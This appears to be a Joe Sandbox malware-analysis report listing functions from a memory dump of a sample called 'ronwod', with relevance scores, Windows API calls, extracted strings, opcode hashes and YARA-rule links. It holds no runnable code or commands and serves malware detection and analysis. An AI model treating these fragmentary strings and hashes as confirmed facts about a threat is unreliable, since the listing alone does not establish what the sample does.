Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: %M)M$)M-M$-M M$4M:M$>M5M$MM
API String ID: 0-1618744259
Opcode ID: 984521e6fedc520f05a84e35f96a2cf2b1a417f8082a1d493378fc7b34d61fe2
Instruction ID: 81e39527029a82c2d9d90697375f93af03566503b6e8e358a29d55f5b2253534
Opcode Fuzzy Hash: 984521e6fedc520f05a84e35f96a2cf2b1a417f8082a1d493378fc7b34d61fe2
Instruction Fuzzy Hash: 6841BBB161D3808AD3249F24E841BABBBB5FFC1358F06582CE4C8AB215E7368445CF57

Function 00EA9930 Relevance: 6.8, APIs: 2, Strings: 1, Instructions: 1513COMMON

Download Yara Rule

APIs

Part of subcall function 00ECCD20: LdrInitializeThunk.NTDLL(00ED009B,?,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 00ECCD4E

FreeLibrary.KERNEL32(?), ref: 00EAA030
FreeLibrary.KERNEL32(?), ref: 00EAA0CE

Strings

Fn@n, xrefs: 00EA9D65

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: Fn@n
API String ID: 764372645-2265005453
Opcode ID: 576e519cc11fac03f8958e457c0828a6553ece5d76beb6ca8aac6017a678506c
Instruction ID: a6dd02128f73a3d050a319ffb1de747b72e505b892bd53a5d1af42a6b7cd7cbe
Opcode Fuzzy Hash: 576e519cc11fac03f8958e457c0828a6553ece5d76beb6ca8aac6017a678506c
Instruction Fuzzy Hash: 51A212766083109FD720CF25D88076BBBE2BFD9304F19582DE995AB352D7B2AC45C782

Function 00EA90D1 Relevance: 6.5, Strings: 5, Instructions: 291COMMON

Download Yara Rule

Strings

FS;S, xrefs: 00EA90FF
7S>S, xrefs: 00EA92C8
LSES, xrefs: 00EA90F4
SS, xrefs: 00EA9254
MR, xrefs: 00EA926A

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 7S>S$FS;S$LSES$MR$SS
API String ID: 0-2954923458
Opcode ID: 6e3be41ab6e5a85ef009c4f0c470ae3864c675bead0bf99a29684ae38a5248c9
Instruction ID: c4037d6a8cddf72f0148199bf14e48bbf68e308eb4fd5680d5509919eb8c5014
Opcode Fuzzy Hash: 6e3be41ab6e5a85ef009c4f0c470ae3864c675bead0bf99a29684ae38a5248c9
Instruction Fuzzy Hash: B4B175B19093918BD3318F15C4917EBF7F2EF8A704F54992CD4C9AB250EBB49846CB92

Function 00EA8170 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 419COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00EA84AC

Strings

S-#9, xrefs: 00EA8929, 00EA8975

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: S-#9
API String ID: 237503144-700798346
Opcode ID: d55aa588d9174e149c906f67106d2a678df7b7e92b8f0e4af59b7e55e4732e51
Instruction ID: 9992a2ddb6e8af90c896c27f6919efd0bd5de0e5b756d6defa023bb8c1e6f23c
Opcode Fuzzy Hash: d55aa588d9174e149c906f67106d2a678df7b7e92b8f0e4af59b7e55e4732e51
Instruction Fuzzy Hash: E7E10872A047128BC724CF29C8417ABB7E2EFD8314F19992DE8D99B264EF38D941C741

Function 00E99570 Relevance: 5.4, Strings: 4, Instructions: 366COMMON

Download Yara Rule

Strings

pid, xrefs: 00E99628
mX, xrefs: 00E995E3
D03407DC3858125CBCFD68B774EF9B7A, xrefs: 00E9961C
bC, xrefs: 00E999A3

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: D03407DC3858125CBCFD68B774EF9B7A$bC$mX$pid
API String ID: 0-1604793958
Opcode ID: 45b4da4c498c6f6a9e6bf4933f2f4d14e9a399ddc78b97844ca98be2425cd4e9
Instruction ID: e1d9b5839522a3dca9218a456db63b830ae08598b882986a353c4dbe46eb962f
Opcode Fuzzy Hash: 45b4da4c498c6f6a9e6bf4933f2f4d14e9a399ddc78b97844ca98be2425cd4e9
Instruction Fuzzy Hash: 75C124B25183008BD728CF24C8516AFBBE5FFC4304F15592DE5AAEB261E734D908CB86

Function 00EB69B0 Relevance: 4.3, Strings: 3, Instructions: 529COMMON

Download Yara Rule

Strings

`], xrefs: 00EB6FAD
ct, xrefs: 00EB6FBD
rj, xrefs: 00EB6A64

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: `]$ct$rj
API String ID: 0-2108563622
Opcode ID: 140dfc58a997559955c503ff8fe62e02480151f4ee62bf58770063461c680500
Instruction ID: 47dd27827cfa626c90311fba93e7fb48464eb2dc6052f4bd04ff5667aa82d30e
Opcode Fuzzy Hash: 140dfc58a997559955c503ff8fe62e02480151f4ee62bf58770063461c680500
Instruction Fuzzy Hash: A80247B65083418FC718CF25D8812ABBBE1EFC5304F19982DE9D5AB251E739D909CB92

Function 00E9EB3B Relevance: 4.2, APIs: 1, Strings: 1, Instructions: 661COMMON

Download Yara Rule

Strings

m, xrefs: 00E9EB49

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: m
API String ID: 0-53672527
Opcode ID: f333f17f210a32b3c35f2acdfff5534635acbd5d4d45347844e657df1816dbc0
Instruction ID: 86cd01e984de718c13384a16d623035531f273206cd344190d4c7ef317fb4c29
Opcode Fuzzy Hash: f333f17f210a32b3c35f2acdfff5534635acbd5d4d45347844e657df1816dbc0
Instruction Fuzzy Hash: 9042A175A197508BD724DF78C4813AFB7E1AF88310F159A2EE8E9D7391E77888418B43

Function 00EA0C83 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 498COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL ref: 00EA0E57

Strings

zI, xrefs: 00EA1121

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: zI
API String ID: 237503144-2601089719
Opcode ID: 988a7250cf62b09f4c17717c8be2e59126b91e2643c3bf1e89c085812429aac7
Instruction ID: d9364ad3119e875cdd70f976632b609e695d2c07ca385864081afba58807d121
Opcode Fuzzy Hash: 988a7250cf62b09f4c17717c8be2e59126b91e2643c3bf1e89c085812429aac7
Instruction Fuzzy Hash: 5412C571A193508BC7689F38C5913EFB7E1AF89320F159A2DE4E9AB3D1D73498448743

Function 00E94BE0 Relevance: 3.3, Strings: 2, Instructions: 833COMMON

Download Yara Rule

Strings

8, xrefs: 00E95516
0, xrefs: 00E9551E

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 2b3be9ecd664d2b6e73e6256c812ef8bb2bb5efe658013793cef4668cbdea1ee
Instruction ID: 58175150df48c0ee93518065291ab186db5998907d8a3673d90f950cb3f2d4ac
Opcode Fuzzy Hash: 2b3be9ecd664d2b6e73e6256c812ef8bb2bb5efe658013793cef4668cbdea1ee
Instruction Fuzzy Hash: 2E7258B16083419FDB15CF18C890B9BBBE1BF88318F04992DF9899B391D375D949CB92

Function 00E99100 Relevance: 2.9, Strings: 2, Instructions: 421COMMON

Download Yara Rule

Strings

@, xrefs: 00E99266
^~dx, xrefs: 00E991FE

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: @$^~dx
API String ID: 0-212991012
Opcode ID: 24ca1a070247fa0e7dc3766229b9d36cf3ddd18c35c2c4cf50af5dad4382c349
Instruction ID: 9b6b8936afbd5eba1b37eadcd0c28eb13b32bf71936f68c774f7c889fe3e8ea7
Opcode Fuzzy Hash: 24ca1a070247fa0e7dc3766229b9d36cf3ddd18c35c2c4cf50af5dad4382c349
Instruction Fuzzy Hash: 4BC1057160C3918AD726CF79C4807ABBBE1AF97304F0858ADE4D5EB282D339C905C766

Function 00EB9630 Relevance: 2.9, Strings: 2, Instructions: 402COMMON

Download Yara Rule

Strings

02"4, xrefs: 00EB97E5
517, xrefs: 00EB9846

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 517$02"4
API String ID: 0-4117730321
Opcode ID: 20092cedd1d283584d3ea4ea9535a1ca26f589b7142df6cc107adae83e7a74eb
Instruction ID: f98e1d4a05317b370d9a55df039ba48e5255d78a53c99e827e546811b071622d
Opcode Fuzzy Hash: 20092cedd1d283584d3ea4ea9535a1ca26f589b7142df6cc107adae83e7a74eb
Instruction Fuzzy Hash: 4ED13572A1C350DFD7149F28E8817ABB7E1EF89314F44992DF5C9A72A2D7369804CB42

Function 00E942A0 Relevance: 2.8, Strings: 2, Instructions: 329COMMON

Download Yara Rule

Strings

), xrefs: 00E9431B
IEND, xrefs: 00E94691

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 40cf2f4e4c9b32f5355f0dd39ec07c605229be95cf32b97f4e8e1c572c79800a
Instruction ID: 713336e0a2303511ba08457287c9c1c50a3d1b95341f76170fb8540290ead736
Opcode Fuzzy Hash: 40cf2f4e4c9b32f5355f0dd39ec07c605229be95cf32b97f4e8e1c572c79800a
Instruction Fuzzy Hash: 07D1B3B16083449FDB10CF24D841B9FBBE4EB95308F14591DF999AB382E375E909CB92

Function 00EA602C Relevance: 2.8, Strings: 2, Instructions: 319COMMON

Download Yara Rule

Strings

@g, xrefs: 00EA6034
D, xrefs: 00EA6417

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: @g$D
API String ID: 0-2006007467
Opcode ID: b9003d86d240b1878f9be487d39eca1c761f1e674101fab702ed2c113133893d
Instruction ID: daaaa7e0db45eac341845ebf3082ac5ccdbc7720bb478d5976d137aca2c3083d
Opcode Fuzzy Hash: b9003d86d240b1878f9be487d39eca1c761f1e674101fab702ed2c113133893d
Instruction Fuzzy Hash: 42B1C0B1418310CBD7248F14C86576BB7F0FF8A318F099A5CE4DA6F2A0E7789949CB56

Function 00EA5A72 Relevance: 2.8, Strings: 2, Instructions: 304COMMON

Download Yara Rule

Strings

7, xrefs: 00EA5BCA
gfff, xrefs: 00EA5C27

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: 7$gfff
API String ID: 0-3777064726
Opcode ID: c69802f18790aaf55ec6365c6d731d3df98b28b74816752d98908d647b000317
Instruction ID: ba20afbab06454232fc142ca053b4a0d653f5b9ba04053e0490d10bca1974339
Opcode Fuzzy Hash: c69802f18790aaf55ec6365c6d731d3df98b28b74816752d98908d647b000317
Instruction Fuzzy Hash: 37A13B73B15A214BD728CF29CC817AB76D2FBC8314F5AD62DD485DB355DA789C028780

Function 00EB7551 Relevance: 2.8, Strings: 2, Instructions: 282COMMON

Download Yara Rule

Strings

>u, xrefs: 00EB78BA
"w, xrefs: 00EB76C6

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: "w$>u
API String ID: 0-2699511544
Opcode ID: 8ea261126f4d9aabeedd1e3032e9d32a0061dcfe64e2004b9737d4ffd493a49d
Instruction ID: 252c1735819deaacdc8eef28df731d4b3c6b7f8012c9349f005ba920e31acb56
Opcode Fuzzy Hash: 8ea261126f4d9aabeedd1e3032e9d32a0061dcfe64e2004b9737d4ffd493a49d
Instruction Fuzzy Hash: D3A14831A09381CFD714CF39E89036ABBE2EFC9324F19866DE5E5672A1D3319909CB51

Function 00E982C0 Relevance: 2.8, Strings: 2, Instructions: 271COMMON

Download Yara Rule

Strings

., xrefs: 00E98319
${*{, xrefs: 00E983BB

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: ${*{$.
API String ID: 0-434639839
Opcode ID: 557dbec590f0aa86fa860b60b017a11b8de17d47b82ff5c6ef412e0edcdac34e
Instruction ID: 772f2532a3b67b83913bff73c382f05288e3e19fd93204431f7fc7d11b5ab937
Opcode Fuzzy Hash: 557dbec590f0aa86fa860b60b017a11b8de17d47b82ff5c6ef412e0edcdac34e
Instruction Fuzzy Hash: 36813F72F043164BCB108E29C98429EB7D3AFC2714F5ADA69D895BB3B5DA34CC4587C1

Function 00ECDB39 Relevance: 2.7, Strings: 2, Instructions: 179COMMON

Download Yara Rule

Strings

@, xrefs: 00ECDB9D
@, xrefs: 00ECDA4D

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 1fdee020126988a855fdb51da8393879028c64dce1f34e9325c13286bae56c4d
Instruction ID: 50064113c2ddabcb38d2634774f118059e510d32874056f4524aa8c9c6f99ca9
Opcode Fuzzy Hash: 1fdee020126988a855fdb51da8393879028c64dce1f34e9325c13286bae56c4d
Instruction Fuzzy Hash: 5B51E3B1A193208BD318CF29CA6072BB7E2EFD5748F04A53DD485A7394E7368C49C782

Function 00E9E9B0 Relevance: 2.6, Strings: 2, Instructions: 145COMMON

Download Yara Rule

Strings

_@, xrefs: 00E9EA5A
t,, xrefs: 00E9E9D0

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: _@$t,
API String ID: 0-2713372951
Opcode ID: 13fa2e29e34dbe4bb79a04a07a0eb81ffa0ec7e832bab6685d14de29161d61ac
Instruction ID: 9fdf9ba4dc54d9c5e757f84f3227e56fe87df5643ab7d8c1bee445af9fdd2eab
Opcode Fuzzy Hash: 13fa2e29e34dbe4bb79a04a07a0eb81ffa0ec7e832bab6685d14de29161d61ac
Instruction Fuzzy Hash: 6551E37251875086D7249F38C8012AFB6E1AFCA730F159B6EF9F6AB3D0D6348900C782

Function 00ECB940 Relevance: 1.9, Strings: 1, Instructions: 652COMMON

Download Yara Rule

Strings

f, xrefs: 00ECBB51

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: f
API String ID: 2994545307-1993550816
Opcode ID: 3bf0c6c24a6715f4f3c0cf3e5f1a69d2e12dcb1b464eb9e6905b366ed29a959f
Instruction ID: b653eeea4485a4e756c76ffa82bb37a76c37f2e61b2328a54432da9e09d95890
Opcode Fuzzy Hash: 3bf0c6c24a6715f4f3c0cf3e5f1a69d2e12dcb1b464eb9e6905b366ed29a959f
Instruction Fuzzy Hash: DC12C1706083019FC724CF19C992B6AB7E6FFD8318F15592DE495AB3A2D7329C06CB42

Function 00ECE710 Relevance: 1.9, Strings: 1, Instructions: 647COMMON

Download Yara Rule

Strings

", xrefs: 00ECEEEE

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-736148933
Opcode ID: db997ef0b0a81b70eb42b225857039fde5aed6aef75408459cfb781737b77087
Instruction ID: 4c83404f1cf02232028e88d54e721b5594bc1e1de8e81fe45b57ae7f9fbf0efa
Opcode Fuzzy Hash: db997ef0b0a81b70eb42b225857039fde5aed6aef75408459cfb781737b77087
Instruction Fuzzy Hash: B6122431719215CFC704CF29E8806AAB3F2FF89311F0A987ED945A73A1EB359955CB80

Function 00ECE820 Relevance: 1.8, Strings: 1, Instructions: 567COMMON

Download Yara Rule

Strings

", xrefs: 00ECEEEE

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-736148933
Opcode ID: b1202830cc543b43adad1cb41857eebbf2469cea95018701cf5d33dc5cf0e455
Instruction ID: ddab9d99dc8f22ea95818d2bcd50ff3892f751299290fd88fe43eaa3d31e26e8
Opcode Fuzzy Hash: b1202830cc543b43adad1cb41857eebbf2469cea95018701cf5d33dc5cf0e455
Instruction Fuzzy Hash: 96022331719215CFC704CF29E8906AAB3F2FB89305F0A987ED945A73A1EB359955CB80

Function 00ECE920 Relevance: 1.7, Strings: 1, Instructions: 484COMMON

Download Yara Rule

Strings

", xrefs: 00ECEEEE

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-736148933
Opcode ID: e388ab54d82afa0a5d6a5392767ae4afdf809b9f172ac3fc83baaa4df1727da4
Instruction ID: a83d0a71385956ca84866dfdf4a971cece8d280ac9be56eca5ca6fac8d80a01f
Opcode Fuzzy Hash: e388ab54d82afa0a5d6a5392767ae4afdf809b9f172ac3fc83baaa4df1727da4
Instruction Fuzzy Hash: 08F10131B19211CFC704CF29E8906AAB3F2FF89315F0A947ED945A73A2E7359955CB80

Function 00ECEA60 Relevance: 1.7, Strings: 1, Instructions: 476COMMON

Download Yara Rule

Strings

", xrefs: 00ECEEEE

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-736148933
Opcode ID: 3c29d5b37d5b646b892835b6f5145fbfa52d9985da8d680cc8b333b33f1583d8
Instruction ID: 844dca2bac288bc16f4d65282d64ba36a23f1dd3fc3b7017e2a45b69ec6b33d7
Opcode Fuzzy Hash: 3c29d5b37d5b646b892835b6f5145fbfa52d9985da8d680cc8b333b33f1583d8
Instruction Fuzzy Hash: 1FE11631A09215CFC718CF39E8507ABB3E2EF89304F0A987ED985A73A1EB359945C741

Function 00EA4161 Relevance: 1.7, Strings: 1, Instructions: 448COMMON

Download Yara Rule

Strings

D]+\, xrefs: 00EA4400

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: D]+\
API String ID: 2994545307-1174097187
Opcode ID: d7f0bba5b476e9a6eaf6da4c00819f12de3f9b3b0c1a02ba4afe166a4869d671
Instruction ID: 2f259da9b047b09afffc9073ccad14f2e80976ce8812aa2e5c7376a2150d8e68
Opcode Fuzzy Hash: d7f0bba5b476e9a6eaf6da4c00819f12de3f9b3b0c1a02ba4afe166a4869d671
Instruction Fuzzy Hash: D1B146B16053119FD7249F18EC8176AB7E2EBC9308F16643DE985BB2E2D3B1AD148741

Function 00ECE9D0 Relevance: 1.7, Strings: 1, Instructions: 446COMMON

Download Yara Rule

Strings

", xrefs: 00ECEEEE

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-736148933
Opcode ID: fbf57c88f1f6f683640537f3e8d078d3b1a9255fc8a5e12c89e9405a0478ade2
Instruction ID: 548deceaff073768a2a023dbd2f2499f902a77808bd35ceb60d607551713961e
Opcode Fuzzy Hash: fbf57c88f1f6f683640537f3e8d078d3b1a9255fc8a5e12c89e9405a0478ade2
Instruction Fuzzy Hash: 41E11331A19215CFC714CF29E8906AAB3F2FF89300F0A987ED945A73A1E7359955CB81

Function 00E9FCCE Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

+, xrefs: 00E9FE16

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: +
API String ID: 1279760036-2126386893
Opcode ID: 5f9d5dd3fb34be4bb400b853651130ba0b217e7c87197f35e656b5e5edbf7394
Instruction ID: 38a9b51b612b6151504a0fc733afb4737a0727d939197248283e4b32c06d6afe
Opcode Fuzzy Hash: 5f9d5dd3fb34be4bb400b853651130ba0b217e7c87197f35e656b5e5edbf7394
Instruction Fuzzy Hash: D1F1A372A097508FC728DF38C5953AEB7D1AF89320F155B2EE8AAE73D1D77498408742

Function 00E98E50 Relevance: 1.5, Strings: 1, Instructions: 272COMMON

Download Yara Rule

Strings

XqR, xrefs: 00E98F8B

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: XqR
API String ID: 0-4205905425
Opcode ID: e9b549860dc5eecda24e6e66b7a3a99159d9fe7ee378efa78ee88bba9d1439d5
Instruction ID: 6ba7081cc4d77b6696689b055fea2058fca1a3f66e03ee4a15341d885c7bf367
Opcode Fuzzy Hash: e9b549860dc5eecda24e6e66b7a3a99159d9fe7ee378efa78ee88bba9d1439d5
Instruction Fuzzy Hash: B371113064C3858AD710DF79D4A03ABFBF1AFA7344F08542CE8D1AB296D77A8909C756

Function 00EB1E60 Relevance: 1.5, Strings: 1, Instructions: 269COMMON

Download Yara Rule

Strings

'', xrefs: 00EB1EA8

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: ''
API String ID: 0-2284169615
Opcode ID: 90832be7a5aff7a23710a04c0d0d12565beeb949428019aa15a4b3e8f8a6318d
Instruction ID: 1a705521527af4e141f780f6f8c37c25ba0e91a094942bff1ef368a32ca852cd
Opcode Fuzzy Hash: 90832be7a5aff7a23710a04c0d0d12565beeb949428019aa15a4b3e8f8a6318d
Instruction Fuzzy Hash: 1971DEB16043019BD724AF64CC92BBB73B4EF81368F14595CFA86AB291E375E904C762

Function 00EAD900 Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

~, xrefs: 00EAD9CB

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: ~
API String ID: 0-1707062198
Opcode ID: 6a5d1ffd965ed704741369e433dcf1b34dbae5cc06789b5f575956b755a9962a
Instruction ID: 58062f9648894b85b02f7919df26311d4d823e6ca54bea9750d3da04bad41b8f
Opcode Fuzzy Hash: 6a5d1ffd965ed704741369e433dcf1b34dbae5cc06789b5f575956b755a9962a
Instruction Fuzzy Hash: CF812E726082614FC7218E288C5039EBBD1AB8A364F19C67DECBAAB791D634DC05D7D1

Function 00EA64A3 Relevance: 1.5, Strings: 1, Instructions: 260COMMON

Download Yara Rule

Strings

pg, xrefs: 00EA676A, 00EA7175

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: pg
API String ID: 2994545307-3979489971
Opcode ID: 5487eb1dc5729a02e8d2f6d0ae2f40704bc4f0cfd948feb6c2f682342155dfea
Instruction ID: ad427cb6fa7e1c57f6529ce49adc173a8d15e1f33904e882d0634cfac647e743
Opcode Fuzzy Hash: 5487eb1dc5729a02e8d2f6d0ae2f40704bc4f0cfd948feb6c2f682342155dfea
Instruction Fuzzy Hash: 968126356153019FD720CF28D88076AB7E2FFDA318F1A982DE4D6EB262D771AC518781

Function 00EB7C29 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

z, xrefs: 00EB7C3B

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: z
API String ID: 0-469683878
Opcode ID: 8e00104e034671ea021eb28f873239fff24fa6cf689634f71d80971411e72603
Instruction ID: d5323694ab6257cf8608764edeb5bc824adc19d4d7d46d7c4a33a1f1d961a4af
Opcode Fuzzy Hash: 8e00104e034671ea021eb28f873239fff24fa6cf689634f71d80971411e72603
Instruction Fuzzy Hash: F371E476B187018FC70CCE29D89026BB7D3ABC9310F59863CD99ADB396DB34E9058781

Function 00EC73D0 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

`', xrefs: 00EC758C

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: `'
API String ID: 0-2167327795
Opcode ID: 91496f2717543ea028079e70e2cd86b6fcc0d575298fe328bc32889010d7d404
Instruction ID: 45b6e74c79a50cce43e9e69f210997af3d1472839d8487eb104d4cbdd9e89045
Opcode Fuzzy Hash: 91496f2717543ea028079e70e2cd86b6fcc0d575298fe328bc32889010d7d404
Instruction Fuzzy Hash: 2271572352C7514BD3149B3CCA401ABABE3AFD5320F29AA3CD4E5A7754E23AC8478753

Function 00EA95FD Relevance: 1.4, Strings: 1, Instructions: 199COMMON

Download Yara Rule

Strings

Q R , xrefs: 00EA9759

Memory Dump Source

Source File: 00000000.00000002.1973401064.0000000000E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_ronwod.jbxd

Yara matches

Similarity

API ID:
String ID: Q R
